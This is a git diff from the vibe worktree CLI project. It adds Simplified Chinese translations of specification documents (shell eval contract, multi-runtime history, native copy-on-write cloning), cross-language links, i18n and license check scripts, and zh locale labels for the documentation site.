+| 载荷必须 ≤ 1 MB（**MUST**，`MAX_STDIN_SIZE`）；读取在 `max + 1` 字节处停止，因此超大载荷绝不会被完整缓冲。 |
+| 空白、纯空格或无法解析的输入不产生任何值（此时命令会在 stderr 上报告用法错误）。                     |
+
+字段：
+
+- `start`：`{"name": "<branch>"}` —— 必须是非空字符串（**MUST**），不得包含 NUL 字节（**MUST NOT**），也不得以 `-` 开头（**MUST NOT**，以免 `--force` / `-b` 被塞进 `git worktree add` 的标志位）。以 CLI 参数给出的分支名优先于 stdin。
+- `clean`：`{"worktree_path": "<绝对路径>"}` —— 必须是通过 `validate_path` 校验的非空绝对路径（**MUST**，不含 NUL、`\n`/`\r`、`$(`、反引号）。`clean` 还会额外拒绝不在实际 git worktree 集合中的路径。
+
+### 7.2 响应（stdout）
+
+| 命令                                | stdout                                                                |
+| ----------------------------------- | ---------------------------------------------------------------------- |
+| `start --claude-code-worktree-hook` | 经由 `Outcome::stdout_path` 输出的裸 worktree 路径 —— **不带**末尾换行符，且**不是** `cd` 行 |
+| `clean --claude-code-worktree-hook` | 不输出任何内容（`Outcome::none()`）；导航由 Claude Code 控制             |
+| 两者，dry run / 路径被拒绝时         | 不输出任何内容                                                          |
+
+两者的诊断信息都以 `[cc-worktree-hook]` 为前缀的行输出到 stderr。
+
+## 8. 测试职责
+
+| 层级                                                     | 证明什么                                                                                             |
+| -------------------------------------------------------- | ------------------------------------------------------------------------------------------------------ |
+| 单元测试（`vibe-core` / `vibe` 中的 `#[cfg(test)]`）       | 处理函数的逻辑，以及处理函数返回的 `Outcome`。由于不存在进程边界，它们**无法**证明流的分离。 |
+| `rust/crates/vibe/tests/eval_contract.rs`                 | 以 stdout 与 stderr 分处**独立管道**的方式驱动**已构建的**二进制文件，并断言每条流上的精确字节。这是唯一能够证明流分离的层级。 |
+| `rust/crates/vibe/tests/wrapper_round_trip.rs`            | 启动**真实的 shell**（bash、zsh、fish、nu、pwsh），加载二进制文件输出的包装函数，并断言 shell 自身的 cwd 确实发生了变化——包括含单引号的路径。这是唯一能够证明包装函数**确实工作**（而不仅仅是字节符合预期）的层级。若解释器不存在，对应 shell 会被跳过；设置 `VIBE_REQUIRE_SHELLS` 则会将"缺失"转为失败，CI 中已设置该变量，因此不会有 shell 被静默跳过。 |
+| PTY E2E（`packages/e2e`）                                  | 交互式行为（提示、TTY 判定）。PTY 在设计上会**合并**两条流，因此无法断言流的分离。 |
+
+规则：任何影响 stdout / stderr 分离的变更都必须在 `rust/crates/vibe/tests/eval_contract.rs` 中新增用例（**MUST**）。任何对包装函数或对某个 dialect 的 `cd` 语法的变更，还必须额外由 `wrapper_round_trip.rs` 覆盖（**MUST**）。
+
+### 8.1 可追溯性：MUST → 强制手段
+
+| 规范规则                                          | 机械化强制手段                                                              |
+| ------------------------------------------------ | --------------------------------------------------------------------------- |
+| 唯一的 stdout 写入点（§4.1）                      | clippy `print_stdout` / `dbg_macro` 在整个 workspace 中 deny；`rust/clippy.toml` 中禁用 `std::io::stdout`；唯一的 `#[allow]` 位于 `eval_output.rs` |
+| 各 dialect 逐字节精确的 stdout 语法（§4.2、§4.3、§6） | `rust/crates/vibe/tests/eval_contract.rs` 中的逐字节用例                  |
+| 包装函数确实改变 shell 的 cwd（§3）                | `rust/crates/vibe/tests/wrapper_round_trip.rs`（真实 shell，CI 中设置 `VIBE_REQUIRE_SHELLS`） |
+| 内部标志不暴露于补全（§3、§7）                     | `rust/crates/vibe/src/cli.rs` 中的 `INTERNAL_FLAGS_NOT_EXPOSED` 一致性测试   |
+
+## 9. 变更管理
+
+以下均属于**破坏性变更**，因为已安装的 shell 包装函数与补全脚本依赖于精确的字节序列：
+
+- `shell_setup.rs` 中包装函数文本的任何字节级变更；
+- 生成的补全输出的任何字节级变更；
+- `shell_escape` / `format_cd_command` 输出的任何变更；
+- `cd '<escaped>'` 语法的任何变更（新增行、丢失换行符、改用其他命令）。
+
+此类变更必须按破坏性发布对待，并同步更新 `eval_contract.rs` 中的用例（**MUST**）。
+
+### 9.1 变更记录：`--eval-dialect`（2.x 小版本）
+
+引入 `--eval-dialect` 的那个版本改变了 **nushell 与 powershell** 包装函数的字节序列。它作为 **2.x 小版本（`feat`）**而非大版本发布，是对上述规则的一次刻意例外。
+
+作出例外的理由：该规则的存在是为了保护*可用的*用户配置。而被替换掉的这两个包装函数都不可用——nushell 版因三个彼此独立的原因在结构上就无法工作（在子 `nu` 进程中执行 `cd`、无法解析的 POSIX 转义，以及非 `--wrapped` 的签名在解析阶段就拒绝一切带标志的调用），powershell 版则会在所有 stdout 为空的命令上抛出异常，并错误处理含引号的路径（§6.1）。替换一个从未起过作用的包装函数不会造成任何退化。用户真正依赖的 bash、zsh、fish 包装函数的字节序列没有变化。
+
+兼容性矩阵：
+
+| 组合                            | 行为                                                                                          |
+| ------------------------------ | ---------------------------------------------------------------------------------------------- |
+| 旧的已粘贴包装函数 + 新二进制文件 | 不会传递 `--eval-dialect` → Posix dialect → **与今天完全相同的字节序列**。没有退化；旧包装函数保持原状（bash/zsh/fish 依旧可用，nu/pwsh 依旧损坏）。 |
+| 新包装函数 + 旧二进制文件        | clap 拒绝这个未知标志：**退出码 2**，stdout 为空，不会 eval 任何内容。失败方式是安全的——用户会在 stderr 上看到 clap 的错误，绝不会执行残缺的一行。 |
+| 新包装函数 + 新二进制文件        | `cd` 在全部五种 shell 上均可工作，含单引号的路径亦然。                                            |
+
+*今后*对任何已知可用的包装函数所做的变更，仍必须按破坏性变更对待（**MUST**）。
+
+## 10. 参考
+
+实现的 ground truth：
+
+- `rust/crates/vibe/src/eval_output.rs` —— 唯一的 stdout 写入点与换行符防护
+- `rust/crates/vibe/src/main.rs` —— 唯一的调用点；将 clap 的输出导向 stderr
+- `rust/crates/vibe-core/src/commands/mod.rs` —— `Outcome` 及其构造函数
+- `rust/crates/vibe-core/src/shell.rs` —— `shell_escape`、`format_cd_command`
+- `rust/crates/vibe-core/src/commands/shell_setup.rs` —— 各 shell 的包装函数文本
+- `rust/crates/vibe-core/src/output.rs`、`rust/crates/vibe-core/src/hooks.rs` —— stderr 一侧
+- `rust/crates/vibe-core/src/stdin.rs`、`rust/crates/vibe/src/cli.rs` —— Claude Code hook 协议、`--eval-dialect` 以及内部标志排除列表
+- `rust/clippy.toml` —— 将 `std::io::stdout` 挡在生产代码之外的 disallowed-methods 列表
+- `rust/crates/vibe/tests/eval_contract.rs` —— 本规格的可执行形式
+- `rust/crates/vibe/tests/wrapper_round_trip.rs` —— 针对全部包装函数与 dialect 的真实 shell 往返测试
+
+相关文档：
+
+- `docs/architecture.md` 的 "Shell Wrapper Architecture" —— 设计历史（描述的是已被删除的 TypeScript 实现）
+- `docs/SECURITY_CHECKLIST.md` §10 "Shell Output Injection" 与 §13 "eval / Dynamic Code Execution" —— 本契约的威胁模型视角

--- a/docs/specifications/multi-runtime.ja.md
+++ b/docs/specifications/multi-runtime.ja.md
@@ -1,4 +1,4 @@
-> 🇺🇸 [English](./multi-runtime.md)
+> 🇺🇸 [English](./multi-runtime.md) | 🇨🇳 [简体中文](./multi-runtime.zh.md)
 
 # Multi-Runtime Support
 

--- a/docs/specifications/multi-runtime.zh.md
+++ b/docs/specifications/multi-runtime.zh.md
@@ -1,35 +1,35 @@
-> 🇯🇵 [日本語版](./multi-runtime.ja.md) | 🇨🇳 [简体中文](./multi-runtime.zh.md)
+> 🇺🇸 [English](./multi-runtime.md) | 🇯🇵 [日本語版](./multi-runtime.ja.md)
 
 # Multi-Runtime Support
 
-> **Historical note:** The TypeScript implementation described here was removed in Phase 6 of the Rust port. vibe is now a single Rust binary and the worktree logic lives in `rust/crates/vibe-core`. This document is retained as design history.
+> **历史性说明：** 此处描述的 TypeScript 实现已在 Rust 移植的 Phase 6 中被删除。vibe 现在是单一的 Rust 二进制文件，worktree 逻辑位于 `rust/crates/vibe-core`。本文档作为设计历史保留。
 
-In the TypeScript-era implementation, vibe provided a runtime abstraction layer that enabled the CLI to run on multiple JavaScript/TypeScript runtimes including Deno, Node.js, and Bun. The current implementation is a single Rust binary and does not support Deno.
+在 TypeScript 时代的实现中，vibe 提供了一个运行时抽象层，使 CLI 能够在包括 Deno、Node.js 和 Bun 在内的多个 JavaScript/TypeScript 运行时上运行。当前实现是单一的 Rust 二进制文件，不支持 Deno。
 
-## What is the Runtime Abstraction Layer?
+## 什么是运行时抽象层？
 
-The runtime abstraction layer provides a unified interface for platform-specific operations such as file system access, process execution, and environment variables. This allows the same codebase to run on different runtimes without modification.
+运行时抽象层为文件系统访问、进程执行、环境变量等平台相关操作提供统一的接口。这使得同一套代码库无需修改即可在不同运行时上运行。
 
-**Benefits:**
+**优势：**
 
-- Single codebase for multiple runtimes
-- Easy testing with mock implementations
-- Consistent API across platforms
-- Dependency injection support
+- 面向多个运行时的单一代码库
+- 借助 mock 实现轻松测试
+- 跨平台一致的 API
+- 支持依赖注入
 
-## Architecture Overview
+## 架构概览
 
 ```mermaid
 flowchart TD
-    subgraph App["Application Code"]
+    subgraph App["应用程序代码"]
         AppDesc["commands, services, utils"]
     end
 
     subgraph Ctx["AppContext"]
-        CtxDesc["Dependency Injection Container"]
+        CtxDesc["依赖注入容器"]
     end
 
-    subgraph Runtime["Runtime Interface"]
+    subgraph Runtime["Runtime 接口"]
         RuntimeDesc["fs, process, env, build, control, io, errors, signals"]
     end
 
@@ -47,25 +47,25 @@ flowchart TD
     Runtime --> Node
 ```
 
-## Runtime Interface
+## Runtime 接口
 
-The `Runtime` interface (`packages/core/src/runtime/types.ts`) defines the contract for all runtime implementations:
+`Runtime` 接口（`packages/core/src/runtime/types.ts`）定义了所有运行时实现必须遵守的契约：
 
-| Module    | Description                          | Example Methods                        |
-| --------- | ------------------------------------ | -------------------------------------- |
-| `fs`      | File system operations               | readFile, writeTextFile, mkdir, rename |
-| `process` | Process execution                    | run, spawn                             |
-| `env`     | Environment variables                | get, set, delete, toObject             |
-| `build`   | Platform information                 | os, arch                               |
-| `control` | Process control                      | exit, chdir, cwd, execPath, args       |
-| `io`      | Standard I/O streams                 | stdin, stderr                          |
-| `errors`  | Runtime-specific error types         | NotFound, AlreadyExists, isNotFound    |
-| `signals` | Signal handling                      | addListener, removeListener            |
-| `ffi`     | FFI operations (Deno-only, optional) | dlopen                                 |
+| 模块      | 说明                            | 方法示例                               |
+| --------- | ------------------------------- | -------------------------------------- |
+| `fs`      | 文件系统操作                    | readFile, writeTextFile, mkdir, rename |
+| `process` | 进程执行                        | run, spawn                             |
+| `env`     | 环境变量                        | get, set, delete, toObject             |
+| `build`   | 平台信息                        | os, arch                               |
+| `control` | 进程控制                        | exit, chdir, cwd, execPath, args       |
+| `io`      | 标准 I/O 流                     | stdin, stderr                          |
+| `errors`  | 运行时特有的错误类型            | NotFound, AlreadyExists, isNotFound    |
+| `signals` | 信号处理                        | addListener, removeListener            |
+| `ffi`     | FFI 操作（仅 Deno，可选）       | dlopen                                 |
 
-## Runtime Detection
+## 运行时检测
 
-The runtime is automatically detected at module load time:
+运行时在模块加载时被自动检测：
 
 ```typescript
 // From packages/core/src/runtime/index.ts
@@ -92,11 +92,11 @@ function detectRuntime(): "deno" | "node" | "bun" {
 }
 ```
 
-## Implementation Details
+## 实现细节
 
 ### Deno Runtime
 
-Uses Deno's built-in APIs directly:
+直接使用 Deno 的内置 API：
 
 ```typescript
 // packages/core/src/runtime/deno/fs.ts
@@ -118,7 +118,7 @@ export const denoFS: RuntimeFS = {
 
 ### Node.js Runtime
 
-Wraps Node.js APIs to match the Runtime interface:
+将 Node.js API 包装为符合 Runtime 接口的形式：
 
 ```typescript
 // packages/core/src/runtime/node/fs.ts
@@ -144,11 +144,11 @@ export const nodeFS: RuntimeFS = {
 };
 ```
 
-## Usage Pattern
+## 使用模式
 
 ### Application Context
 
-The `AppContext` provides dependency injection for the runtime:
+`AppContext` 为运行时提供依赖注入：
 
 ```typescript
 // packages/core/src/context/index.ts
@@ -159,9 +159,9 @@ export interface AppContext {
 }
 ```
 
-### Using in Functions
+### 在函数中使用
 
-Functions accept an optional `ctx` parameter with a default value:
+函数接收一个带默认值的可选 `ctx` 参数：
 
 ```typescript
 export async function someFunction(
@@ -184,9 +184,9 @@ export async function someFunction(
 }
 ```
 
-### Initialization
+### 初始化
 
-At application startup:
+在应用程序启动时：
 
 ```typescript
 import { initRuntime, createAppContext, setGlobalContext } from "./runtime/index.ts";
@@ -200,9 +200,9 @@ const ctx = createAppContext(runtime);
 setGlobalContext(ctx);
 ```
 
-## Testing Support
+## 测试支持
 
-The abstraction layer enables easy mocking for tests:
+抽象层使得测试中的 mock 变得容易：
 
 ```typescript
 // Create a mock runtime
@@ -223,7 +223,7 @@ const testCtx: AppContext = { runtime: mockRuntime };
 await someFunction(options, testCtx);
 ```
 
-## File Structure
+## 文件结构
 
 ```
 packages/core/src/runtime/
@@ -251,15 +251,32 @@ packages/core/src/context/
 └── index.ts           # AppContext definition and management
 ```
 
-## Platform-specific Features
+**文件说明：**
 
-| Feature               | Deno | Node.js | Bun   |
-| --------------------- | ---- | ------- | ----- |
-| File System           | Yes  | Yes     | Yes\* |
-| Process Execution     | Yes  | Yes     | Yes\* |
-| Environment Variables | Yes  | Yes     | Yes\* |
-| Signal Handling       | Yes  | Yes     | Yes\* |
-| FFI (Native Calls)    | Yes  | No\*\*  | No    |
+| 文件               | 说明                     |
+| ------------------ | ------------------------ |
+| `runtime/index.ts` | 运行时检测与初始化       |
+| `runtime/types.ts` | Runtime 接口定义         |
+| `deno/index.ts`    | Deno 运行时组装          |
+| `node/index.ts`    | Node.js 运行时组装       |
+| `*/fs.ts`          | 文件系统实现             |
+| `*/process.ts`     | 进程执行实现             |
+| `*/env.ts`         | 环境变量与控制的实现     |
+| `*/io.ts`          | I/O 流实现               |
+| `*/errors.ts`      | 错误类型实现             |
+| `*/signals.ts`     | 信号处理实现             |
+| `deno/ffi.ts`      | FFI 实现（仅 Deno）      |
+| `context/index.ts` | AppContext 定义与管理    |
 
-\* Bun uses the Node.js runtime implementation
-\*\* Node.js requires the `@kexi/vibe-native` package for native operations
+## 平台相关功能
+
+| 功能             | Deno | Node.js | Bun   |
+| ---------------- | ---- | ------- | ----- |
+| 文件系统         | Yes  | Yes     | Yes\* |
+| 进程执行         | Yes  | Yes     | Yes\* |
+| 环境变量         | Yes  | Yes     | Yes\* |
+| 信号处理         | Yes  | Yes     | Yes\* |
+| FFI（原生调用）  | Yes  | No\*\*  | No    |
+
+\* Bun 使用 Node.js 运行时实现
+\*\* Node.js 的原生操作需要 `@kexi/vibe-native` 包

--- a/docs/specifications/native-clone.ja.md
+++ b/docs/specifications/native-clone.ja.md
@@ -1,4 +1,4 @@
-> 🇺🇸 [English](./native-clone.md)
+> 🇺🇸 [English](./native-clone.md) | 🇨🇳 [简体中文](./native-clone.zh.md)
 
 # ネイティブクローン実装
 

--- a/docs/specifications/native-clone.md
+++ b/docs/specifications/native-clone.md
@@ -1,4 +1,4 @@
-> 🇯🇵 [日本語版](./native-clone.ja.md)
+> 🇯🇵 [日本語版](./native-clone.ja.md) | 🇨🇳 [简体中文](./native-clone.zh.md)
 
 # Native Clone Implementation
 

--- a/docs/specifications/native-clone.zh.md
+++ b/docs/specifications/native-clone.zh.md
@@ -1,0 +1,205 @@
+> 🇺🇸 [English](./native-clone.md) | 🇯🇵 [日本語版](./native-clone.ja.md)
+
+# 原生克隆实现
+
+> **历史性说明：** 此处描述的 TypeScript 运行时分支已在 Rust 移植的 Phase 6 中被删除。vibe 现在是单一的 Rust 二进制文件，原生 CoW 实现位于 `rust/crates/vibe-native`（静态链接进 `rust/crates/vibe-core`）。本文档作为设计历史保留。
+
+这份历史文档说明了 TypeScript 时代的实现为何采用 Rust 来完成原生的 Copy-on-Write（CoW）操作，以及该实现在 Deno 与 Node.js 运行时之间有何差异。
+
+## 为什么选择 Rust？
+
+TypeScript 时代的实现在 `@kexi/vibe-native` 包中通过 [napi-rs](https://napi.rs/) 使用 Rust，以调用 JavaScript 运行时标准 API 无法提供的 OS 级 CoW API。
+
+### 与替代方案的对比
+
+| 语言     | 优点                                       | 缺点                                 |
+| -------- | ------------------------------------------ | ------------------------------------ |
+| **Rust** | 内存安全、napi-rs 生态系统、强类型         | 编译时间较长                         |
+| C/C++    | 直接 FFI、无运行时开销                     | 手动内存管理、安全风险               |
+| Zig      | 简洁的 C 互操作、二进制体积小              | 面向 Node.js 绑定的生态系统较小      |
+
+选择 Rust 的理由：
+
+1. **内存安全**：Rust 的所有权模型可防止缓冲区溢出、use-after-free 等常见漏洞
+2. **napi-rs 生态系统**：构建 Node.js 原生插件的成熟工具链，并可自动生成 TypeScript 类型
+3. **跨平台支持**：单一代码库即可为 macOS（x64/arm64）和 Linux（x64/arm64）编译
+
+## 架构概览
+
+在 TypeScript 时代的实现中，Deno 2.x 与 Node.js 使用同一个 `@kexi/vibe-native` N-API 模块来完成原生 CoW 操作。当前实现不再支持 Deno，而是直接使用 Rust crate。
+
+```mermaid
+flowchart TD
+    subgraph App["vibe CLI"]
+        CopyService["CopyService"]
+    end
+
+    subgraph Runtime["JavaScript Runtime"]
+        Deno["🦕 Deno 2.x"]
+        Node["💚 Node.js"]
+    end
+
+    subgraph Native["@kexi/vibe-native (N-API)"]
+        NapiRs["napi-rs (Rust)"]
+    end
+
+    subgraph OS["操作系统"]
+        Darwin["macOS: clonefile()"]
+        Linux["Linux: FICLONE ioctl"]
+    end
+
+    CopyService --> Deno
+    CopyService --> Node
+    Deno --> NapiRs
+    Node --> NapiRs
+    NapiRs --> Darwin
+    NapiRs --> Linux
+```
+
+## 统一的 N-API 实现
+
+### 为什么两个运行时都用 N-API？
+
+Deno 2.x 增加了对 N-API 模块的支持（通过 `npm:` 说明符），使我们得以统一实现：
+
+| 方面       | 以前（Deno FFI）        | 当前（统一 N-API）              |
+| ---------- | ----------------------- | ------------------------------- |
+| 代码重复   | 约 400 行 FFI 代码      | 单一的 Rust 实现                |
+| 维护成本   | 两条代码路径            | 一个共享模块                    |
+| 安全标志   | 各自独立实现            | 统一的 `CLONE_NOFOLLOW` 处理    |
+| 性能       | 每次调用的 FFI 开销     | 经过优化的 N-API 绑定           |
+
+### Rust 原生插件（N-API）
+
+Deno 2.x 与 Node.js 都使用同一个基于 Rust 的原生插件：
+
+```rust
+// packages/native/src/lib.rs
+#[napi]
+pub fn clone_sync(src: String, dest: String) -> Result<()> {
+    platform::clone_file(Path::new(&src), Path::new(&dest))
+        .map_err(|e| e.into())
+}
+```
+
+**优点：**
+
+- 更好的性能（无需每次调用进行 FFI 编组）
+- 类型安全的 Rust 实现
+- 面向常见平台的预构建二进制文件（macOS x64/arm64、Linux x64/arm64）
+- 在 Deno 与 Node.js 之间行为一致
+
+**当时的要求：**
+
+- Deno 2.x 或 Node.js 18+
+- 预构建二进制文件，或用于编译的 Rust 工具链
+
+## 平台相关实现
+
+### macOS：clonefile()
+
+| 方面           | 详情                                     |
+| -------------- | ---------------------------------------- |
+| 系统调用       | `clonefile()`                            |
+| 文件系统       | 需要 APFS                                |
+| 文件支持       | 有                                       |
+| 目录支持       | 有                                       |
+| 安全标志       | `CLONE_NOFOLLOW`（防止跟随符号链接）      |
+
+```rust
+// darwin.rs (simplified)
+extern "C" {
+    fn clonefile(src: *const c_char, dst: *const c_char, flags: u32) -> c_int;
+}
+
+const CLONE_NOFOLLOW: u32 = 0x0001;
+
+pub fn clone_file(src: &Path, dest: &Path) -> CloneResult<()> {
+    validate_file_type(src)?;  // Security: reject symlinks, devices
+    unsafe { clonefile(src_cstr.as_ptr(), dest_cstr.as_ptr(), CLONE_NOFOLLOW) }
+}
+```
+
+### Linux：FICLONE ioctl
+
+| 方面           | 详情                          |
+| -------------- | ----------------------------- |
+| 系统调用       | `ioctl(FICLONE)`              |
+| 文件系统       | Btrfs、XFS（启用 reflink）    |
+| 文件支持       | 有                            |
+| 目录支持       | 无                            |
+| 安全标志       | open 时使用 `O_NOFOLLOW`      |
+
+```rust
+// linux.rs (simplified)
+nix::ioctl_write_int!(ficlone, 0x94, 9);
+
+pub fn clone_file(src: &Path, dest: &Path) -> CloneResult<()> {
+    validate_file_type(src)?;  // Security: reject symlinks, devices, directories
+    let src_file = OpenOptions::new()
+        .read(true)
+        .custom_flags(libc::O_NOFOLLOW)  // Security: reject symlinks
+        .open(src)?;
+    unsafe { ficlone(dest_file.as_raw_fd(), src_file.as_raw_fd() as u64) }
+}
+```
+
+## 安全考量
+
+Rust 实现包含以下若干安全措施：
+
+### 文件类型校验
+
+仅允许常规文件（以及 macOS 上的目录）。被拒绝的类型：
+
+| 类型         | 理由                                       |
+| ------------ | ------------------------------------------ |
+| 符号链接     | 防止路径遍历攻击（CWE-59, CWE-61）          |
+| 块设备       | 防止访问 /dev/sda 等                        |
+| 字符设备     | 防止访问 /dev/mem 等                        |
+| 套接字       | 防止 IPC 被滥用                             |
+| FIFO         | 防止对命名管道的操纵                        |
+
+### 竞态条件防护
+
+- **macOS**：使用 `CLONE_NOFOLLOW` 标志，并通过 `__error()` 立即捕获 errno
+- **Linux**：打开文件时使用 `O_NOFOLLOW` 标志
+
+### OWASP 参考
+
+- A01:2021 - 访问控制失效（文件类型校验）
+- A04:2021 - 不安全的设计（errno 竞态条件防护）
+
+## 从源码构建
+
+```bash
+cd packages/native
+
+# Install dependencies
+pnpm install
+
+# Build (requires Rust toolchain)
+pnpm run build
+
+# Run Rust tests
+cargo test
+
+# Build for release (with optimizations)
+pnpm run build:release
+```
+
+### Release 配置
+
+```toml
+# Cargo.toml
+[profile.release]
+lto = true           # Link-time optimization
+strip = "symbols"    # Remove debug symbols
+opt-level = "z"      # Optimize for size
+```
+
+## 相关文档
+
+- [复制策略](./copy-strategies.zh.md) - 整体的复制策略选择
+- [多运行时支持](./multi-runtime.zh.md) - 运行时抽象层
+- `@kexi/vibe-native` README - 包 API 文档（`packages/native` 包已在 Phase 6 中被删除，原生 CoW 实现现位于 `rust/crates/vibe-native`）

--- a/justfile
+++ b/justfile
@@ -18,7 +18,7 @@ default:
 
 # --- Aggregate check ---
 
-# All checks required before opening a PR (fmt:check + lint + check:rust + test:npm + test:e2e + check:docs).
+# All checks required before opening a PR (fmt:check + lint + check:rust + check:licenses + test:npm + test:e2e + check:docs).
 check:
     pnpm run check:all
 
@@ -37,6 +37,10 @@ run *args:
 # Rust (shipped binary) — fmt + clippy + workspace tests.
 check-rust:
     pnpm run check:rust
+
+# Third-party license notices — THIRD-PARTY-LICENSES.md freshness + the ring link guard.
+check-licenses:
+    pnpm run check:licenses
 
 # Docs package checks only (lint + format + check).
 check-docs:

--- a/justfile
+++ b/justfile
@@ -18,7 +18,7 @@ default:
 
 # --- Aggregate check ---
 
-# All checks required before opening a PR (fmt:check + lint + check:rust + check:licenses + test:npm + test:e2e + check:docs).
+# All checks required before opening a PR (fmt:check + lint + check:i18n + check:rust + check:licenses + test:npm + test:e2e + check:docs).
 check:
     pnpm run check:all
 
@@ -41,6 +41,10 @@ check-rust:
 # Third-party license notices — THIRD-PARTY-LICENSES.md freshness + the ring link guard.
 check-licenses:
     pnpm run check:licenses
+
+# Documentation i18n — en/ja/zh triplets, docs-site locale mirrors, cross-language links.
+check-i18n:
+    pnpm run check:i18n
 
 # Docs package checks only (lint + format + check).
 check-docs:

--- a/package.json
+++ b/package.json
@@ -26,6 +26,7 @@
     "build:rust": "cargo build --manifest-path rust/Cargo.toml -p vibe --release",
     "check:rust": "pnpm run fmt:rust:check && pnpm run lint:rust && pnpm run test:rust",
     "check:licenses": "bun run scripts/generate-third-party-licenses.ts --check && bun run scripts/check-ring-unlinked.ts",
+    "check:i18n": "bun run scripts/check-markdown-i18n.ts",
     "get-version": "node -e \"console.log(JSON.parse(require('fs').readFileSync('package.json')).version)\"",
     "bmp": "deno run --frozen --allow-env=NO_COLOR,TERM,CI,LOG_TOKENS,LOG_STREAM --allow-read=.bmp.yml,package.json,packages/npm/package.json,packages/vibe-linux-x64/package.json,packages/vibe-linux-arm64/package.json,packages/vibe-darwin-x64/package.json,packages/vibe-darwin-arm64/package.json,packages/vibe-win32-x64/package.json,rust/crates/vibe/Cargo.toml,rust/crates/vibe-core/Cargo.toml,rust/crates/vibe-test-support/Cargo.toml,pnpm-lock.yaml --allow-write=.bmp.yml,package.json,packages/npm/package.json,packages/vibe-linux-x64/package.json,packages/vibe-linux-arm64/package.json,packages/vibe-darwin-x64/package.json,packages/vibe-darwin-arm64/package.json,packages/vibe-win32-x64/package.json,rust/crates/vibe/Cargo.toml,rust/crates/vibe-core/Cargo.toml,rust/crates/vibe-test-support/Cargo.toml,pnpm-lock.yaml jsr:@kt3k/bmp@0.3.3",
     "install:all": "pnpm install",
@@ -33,7 +34,7 @@
     "test:e2e": "cargo build --manifest-path rust/Cargo.toml -p vibe && pnpm -C packages/e2e test",
     "clean": "pnpm -r exec rm -rf node_modules dist",
     "check:docs": "pnpm -C packages/docs lint && pnpm -C packages/docs format && pnpm -C packages/docs check",
-    "check:all": "pnpm run fmt:check && pnpm run lint && pnpm run check:rust && pnpm run check:licenses && pnpm run test:npm && pnpm run test:e2e && pnpm run check:docs"
+    "check:all": "pnpm run fmt:check && pnpm run lint && pnpm run check:i18n && pnpm run check:rust && pnpm run check:licenses && pnpm run test:npm && pnpm run test:e2e && pnpm run check:docs"
   },
   "devDependencies": {
     "@oxlint/plugins": "^1.67.0",

--- a/package.json
+++ b/package.json
@@ -25,6 +25,7 @@
     "test:rust": "cargo test --manifest-path rust/Cargo.toml --workspace",
     "build:rust": "cargo build --manifest-path rust/Cargo.toml -p vibe --release",
     "check:rust": "pnpm run fmt:rust:check && pnpm run lint:rust && pnpm run test:rust",
+    "check:licenses": "bun run scripts/generate-third-party-licenses.ts --check && bun run scripts/check-ring-unlinked.ts",
     "get-version": "node -e \"console.log(JSON.parse(require('fs').readFileSync('package.json')).version)\"",
     "bmp": "deno run --frozen --allow-env=NO_COLOR,TERM,CI,LOG_TOKENS,LOG_STREAM --allow-read=.bmp.yml,package.json,packages/npm/package.json,packages/vibe-linux-x64/package.json,packages/vibe-linux-arm64/package.json,packages/vibe-darwin-x64/package.json,packages/vibe-darwin-arm64/package.json,packages/vibe-win32-x64/package.json,rust/crates/vibe/Cargo.toml,rust/crates/vibe-core/Cargo.toml,rust/crates/vibe-test-support/Cargo.toml,pnpm-lock.yaml --allow-write=.bmp.yml,package.json,packages/npm/package.json,packages/vibe-linux-x64/package.json,packages/vibe-linux-arm64/package.json,packages/vibe-darwin-x64/package.json,packages/vibe-darwin-arm64/package.json,packages/vibe-win32-x64/package.json,rust/crates/vibe/Cargo.toml,rust/crates/vibe-core/Cargo.toml,rust/crates/vibe-test-support/Cargo.toml,pnpm-lock.yaml jsr:@kt3k/bmp@0.3.3",
     "install:all": "pnpm install",
@@ -32,7 +33,7 @@
     "test:e2e": "cargo build --manifest-path rust/Cargo.toml -p vibe && pnpm -C packages/e2e test",
     "clean": "pnpm -r exec rm -rf node_modules dist",
     "check:docs": "pnpm -C packages/docs lint && pnpm -C packages/docs format && pnpm -C packages/docs check",
-    "check:all": "pnpm run fmt:check && pnpm run lint && pnpm run check:rust && pnpm run test:npm && pnpm run test:e2e && pnpm run check:docs"
+    "check:all": "pnpm run fmt:check && pnpm run lint && pnpm run check:rust && pnpm run check:licenses && pnpm run test:npm && pnpm run test:e2e && pnpm run check:docs"
   },
   "devDependencies": {
     "@oxlint/plugins": "^1.67.0",

--- a/packages/docs/astro.config.ts
+++ b/packages/docs/astro.config.ts
@@ -31,6 +31,10 @@ j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
           label: "日本語",
           lang: "ja",
         },
+        zh: {
+          label: "简体中文",
+          lang: "zh-CN",
+        },
       },
       social: [
         {
@@ -45,60 +49,60 @@ j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
       sidebar: [
         {
           label: "Introduction",
-          translations: { ja: "はじめに" },
+          translations: { ja: "はじめに", zh: "简介" },
           items: [
             {
               slug: "index",
               label: "Welcome",
-              translations: { ja: "ようこそ" },
+              translations: { ja: "ようこそ", zh: "欢迎" },
             },
             {
               slug: "getting-started",
               label: "Getting Started",
-              translations: { ja: "クイックスタート" },
+              translations: { ja: "クイックスタート", zh: "快速开始" },
             },
           ],
         },
         {
           label: "Installation",
-          translations: { ja: "インストール" },
+          translations: { ja: "インストール", zh: "安装" },
           items: [
             {
               slug: "installation",
               label: "Installation",
-              translations: { ja: "インストール" },
+              translations: { ja: "インストール", zh: "安装" },
             },
             {
               slug: "setup",
               label: "Shell Setup",
-              translations: { ja: "シェル設定" },
+              translations: { ja: "シェル設定", zh: "Shell 设置" },
             },
           ],
         },
         {
           label: "Configuration",
-          translations: { ja: "設定" },
+          translations: { ja: "設定", zh: "配置" },
           items: [{ autogenerate: { directory: "configuration" } }],
         },
         {
           label: "Commands",
-          translations: { ja: "コマンド" },
+          translations: { ja: "コマンド", zh: "命令" },
           items: [{ autogenerate: { directory: "commands" } }],
         },
         {
           label: "Recipes",
-          translations: { ja: "レシピ集" },
+          translations: { ja: "レシピ集", zh: "实用方案" },
           items: [{ autogenerate: { directory: "recipes" } }],
         },
         {
           label: "Security",
-          translations: { ja: "セキュリティ" },
+          translations: { ja: "セキュリティ", zh: "安全" },
           items: [{ autogenerate: { directory: "security" } }],
         },
         {
           slug: "changelog",
           label: "Changelog",
-          translations: { ja: "変更履歴" },
+          translations: { ja: "変更履歴", zh: "更新日志" },
         },
       ],
     }),

--- a/packages/docs/src/content/docs/installation.mdx
+++ b/packages/docs/src/content/docs/installation.mdx
@@ -118,6 +118,11 @@ WSL2 users can use the Linux installation methods below based on their distribut
     sudo apt remove vibe
     ```
 
